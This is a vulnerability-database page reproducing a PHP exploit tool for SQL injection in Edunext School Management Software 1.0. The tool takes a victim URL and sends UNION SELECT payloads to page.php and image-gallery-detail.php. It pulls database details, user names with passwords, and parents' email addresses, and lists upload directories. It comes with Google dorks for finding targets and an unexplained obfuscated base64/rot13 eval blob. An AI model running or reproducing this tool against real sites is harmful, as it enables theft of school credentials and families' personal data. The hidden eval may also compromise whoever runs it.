Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Edunext Systems + School Management Software 1.0 SQL Injection

🗓️ 21 Mar 2025 00:00:00Reported by Emiliano FebbiType 
packetstorm
 packetstorm🔗 packetstorm.news👁 394 Views

Multiple SQL injections found in Edunext Systems School Management Software version 1.0, tested on Windows 10.

Code
# Exploit Title: Edunext Systems + School Management Software ( Multiple SQL injection )
    # Google Dork: inurl:/page.php?PAGE= , inurl:/image-gallery-detail.php?gal_id= , intext:Powered by Edunext Technologies
    # Date: 2025-03-20
    # Exploit Author: Emiliano Febbi
    # Vendor Homepage: https://edunexttechnologies.com/
    # Software Link: https://edunexttechnologies.com/school-management-software.php
    # Version: 1.0
    # Tested on: Windows 10
    
    [code]
    
    
    <?php
    /*
    Not Authenticated why an external server manages logins.
    ----------------------------------------------------------------------------
    Edunext Systems are flawed ((Indian School Management CMS)Training Exploit)
    ----------------------------------------------------------------------------
    emilianofebbi.1994 -at- gmail -dot- com
    
    Author: Emiliano Febbi
    nullsite.altervista.org
    */
    echo'<html><head><title>Indian School Management CMS Multiple SQL injection</title><style>
    body { cursor: crosshair; min-height: 100vh; }</style></head><body>
    <body bgcolor="#000000"><body text="#00ffff"><body link="#808080"><body vlink="#808080">
    <center><form action="'.$SERVER[PHP_SELF].'" method="POST">+ insert victim site +<br> 
    <input type="text" name="victim_url" value="http://www.site.com/">
    <td><font color="#ff0000"> or /dir/</font></td><br>
    <font color="black">..</font>
    <select name="select_bug" id="???"><option value="one">page.php?PAGE=</option>
    <option value="two">image-gallery-detail</option><option value="iframe">#IFRAME=method</option></select><font color="red"> #Select bug</font>
    <br><input type="text" name="num_var" value="2" style="height: 25px;width: 28px">
    <font color="red">Page value: EX: 2</font><br>
    <input type="submit" style="background-color:#00ffff" value="go!"/></form></center></body></html>';
    print "<center>";
    //           Main Server contains alla databases
    //################ ---------> <---------- ##################
    eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));
    //################ ---------> <---------- ##################
    print "</center>";
    //#page.php?PAGE=
    if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "one")) {
      $host = $_POST['victim_url'];
          $num = $_POST['num_var'];
       $bug = $_POST['select_bug'];
    //portal Login and General Login
    $Logins = array("login/login.php", "login/?next=");
    foreach($Logins as $nullus_Logins) {
    if (false!==file("$host$nullus_Logins")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Logins'>$nullus_Logins</a></div></center>";
    };
    print "<center>";
    print "<font color='red'>#host:</font> $host<br>";
    print "<font color='red'>#DB Version: </font>";
    $sperimental = array('<div class="span8 data-table">', '</style>', '<div class="data">');
    foreach($sperimental as $sperimentalx) {
    
         $getall=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,version(),3,4,5,6,7,8,9,10--");
         $getallz=explode("$sperimentalx",$getall);
         $getallz=explode("</div>",$getallz[1]);
              var_dump(strip_tags($getallz[0]));
    print "<br><font color='red'>#DB Name: </font>";
         $getalll=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,database(),3,4,5,6,7,8,9,10--");
         $getallzz=explode("$sperimentalx",$getalll);
         $getallzz=explode("</div>",$getallzz[1]);
               var_dump(strip_tags($getallzz[0]));
    } //???
    $sperimentalz = array('<div class="span8 data-table">', '</style>', '<div class="data">');
    foreach($sperimentalz as $sperimentaly) {
    print "<br><font color='red'>#users:</font><br>";
    $get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--");
         $usertbl=explode("$sperimentaly",$get_users);
         $usertbl=explode("</div>",$usertbl[1]);
              var_dump(strip_tags($usertbl[0]));
    } //??? #2
    $sperimentalzz = array('<div class="span8 data-table">', '</style>', '<div class="data">');
    foreach($sperimentalzz as $sperimentalxy) {
    print "<center>";
    print "<br><font color='red'>#E-Mails Founds in database:</font><br>";
    $get_users=file_get_contents("$host". "page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--");
         $usertbl=explode("$sperimentalxy",$get_users);
         $usertbl=explode("</div>",$usertbl[1]);
              var_dump(strip_tags($usertbl[0]));
    print "</center>";
    } //??? #3
    if(file_get_contents("$host". "upload/")) {
    print "<center><h2>#Lucky Strike</h2>";
    $found_DIRt = file_get_contents("$host". "upload/");
    print $found_DIRt;
    print "</center>";
    }
      };;;
    //#image-gallery-detail
    if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "two")) {
      $host = $_POST['victim_url'];
          $num = $_POST['num_var'];
       $bug = $_POST['select_bug'];
    //portal Login and General Login
    $Loginss = array("login/login.php", "login/?next=");
    foreach($Loginss as $nullus_Loginss) {
    if (false!==file("$host$nullus_Loginss")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Loginss'>$nullus_Loginss</a></div></center>";
    };
    print "<center>";
    print "<font color='red'>#host:</font> $host<br>";
    print "<font color='red'>#DB Version: </font>";
    $sperimental_gall = array('Image Gallery /', '', '');
    foreach($sperimental_gall as $sperimental_gallery) {
    $getallx=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
         $getallzx=explode("$sperimental_gallery",$getallx);
         $getallzx=explode("</span>",$getallzx[1]);
              var_dump(strip_tags($getallzx[0]));
          //.................OR..................
    $getallxb=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
         $getallzxb=explode("$sperimental_gallery",$getallxb);
         $getallzxb=explode("</span>",$getallzxb[1]);
                 var_dump(strip_tags($getallzxb[0]));
          //.................OR..................
    $getallxbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--");
         $getallzxbc=explode("$sperimental_gallery",$getallxbc);
         $getallzxbc=explode("</p>",$getallzxbc[1]);
               var_dump(strip_tags($getallzxbc[0]));
    print "<center><br><font color='red'>#DB Name: </font>";
    //#database();
    $getallxdb=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
         $getallzxdb=explode("$sperimental_gallery",$getallxdb);
         $getallzxdb=explode("</span>",$getallzxdb[1]);
              var_dump(strip_tags($getallzxdb[0]));
    $getallxdbc=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
         $getallzxdbc=explode("$sperimental_gallery",$getallxdbc);
         $getallzxdbc=explode("</span>",$getallzxdbc[1]);
              var_dump(strip_tags($getallzxdbc[0]));
    $getallxdbcd=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--");
         $getallzxdbcd=explode("$sperimental_gallery",$getallxdbcd);
         $getallzxdbcd=explode("</p>",$getallzxdbcd[1]);
                 var_dump(strip_tags($getallzxdbcd[0]));          
    print "</center>";          
            }
             //beyond
             //Variant 1#
    $sperimental_gallv = array('Image Gallery /', '', '');
    foreach($sperimental_gallv as $sperimental_galleryvv) {
    print "<center><br><font color='red'>#users:<br></font>";
    $getallxk=file_get_contents("$host". "Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
         $getallzxk=explode("$sperimental_galleryvv",$getallxk);
         $getallzxk=explode("</span>",$getallzxk[1]);
                 var_dump(strip_tags($getallzxk[0]));
    print "</center>";
           //Variant 2#
    $getallxdbcww=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
         $getallzxdbcww=explode("$sperimental_galleryvv",$getallxdbcww);
         $getallzxdbcww=explode("</div>",$getallzxdbcww[1]);
                    var_dump(strip_tags($getallzxdbcww[0]));       
          //Variant 3#
    print "<center>";
    $getallxdbcwwxx=file_get_contents("$host". "image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--");
         $getallzxdbcwwxx=explode("$sperimental_galleryvv",$getallxdbcwwxx);
         $getallzxdbcwwxx=explode("</p>",$getallzxdbcwwxx[1]);
                    var_dump(strip_tags($getallzxdbcwwxx[0]));
    print "</center>";
    }
    //#Dir trav.
    if(file_get_contents("$host". "upload/")) {
    print "<center><h2>#Lucky Strike</h2>";
    $found_DIRt = file_get_contents("$host". "upload/");
    print $found_DIRt;
    print "</center>";
    }
            };;;;
    //#IFRAME method=100% success
    //--IF you usage this method select well value page or try random value--
    if (isset($_POST['victim_url']) and ($_POST['num_var']) and ($_POST['select_bug'] == "iframe")) {
      $host = $_POST['victim_url'];
          $num = $_POST['num_var'];
       $bug = $_POST['select_bug'];
    print "<center>";
    //portal Login and General Login
    $Loginssx = array("login/login.php", "login/?next=");
    foreach($Loginssx as $nullus_Loginssx) {
    if (false!==file("$host$nullus_Loginssx")) print "Found:<div style='background-color: #00ffff; color: black;'><a href='$host$nullus_Loginssx'>$nullus_Loginssx</a></div></center>";
    };
    print "<br><TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
    print "page.php?PAGE=<br>";
    print "<font color='red'>#DB Version ~ #DB Name:<br></font>";
    print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%20database(),version(),3,4,5,6,7,8,9,10--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#users:<br></font>";
    print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),3,4,5,6,7,8,9,10%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#E-mails:<br></font>";
    print "<iframe width='500' height='300' src='$host/page.php?PAGE=-$num%20union%20all%20select%201,GROUP_CONCAT(mother_email,+%20%27%3Cbr%20/%3E%27%20+,father_email),3,4,5,6,7,8,9,10%20FROM%20alumni_registration--' style='border:3px solid aqua;'></iframe><br>";
    print "</td></tr><table>";
              //#Variant 1
    print "<TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
    print "Image-Gallery-Detail.php?gal_id=<br>";
    print "<font color='red'>#DB Version:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#DB Name:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#users:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/Image-Gallery-Detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
    print "</td></tr><table>";
              //#Variant 2
    print "<TABLE borderColor=aqua  cellSpacing=0 cellPadding=10 width='41%' align= center border=5><tr><td>";
    print "image-gallery-detail.php?gal_id=<br>";
    print "<font color='red'>#DB Version:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,version(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#DB Name:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,database(),4--' style='border:3px solid aqua;'></iframe><br>";
    print "<font color='red'>#users:<br>:</font>";
    print "<iframe width='500' height='300' src='$host/image-gallery-detail.php?gal_id=-$num%20union%20all%20select%201,2,GROUP_CONCAT(user_name,+%20%27%3Cbr%20/%3E%27%20+,password),4%20FROM%20users--' style='border:3px solid aqua;'></iframe><br>";
    print "</td></tr><table>";
    print "</center>";
    };;;;;           
    ?>
    [/code]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Mar 2025 00:00Current
8.6High risk
Vulners AI Score8.6
sql injectionedunext systemsschool management softwareversion oneexploit detailsemiliano febbi.
394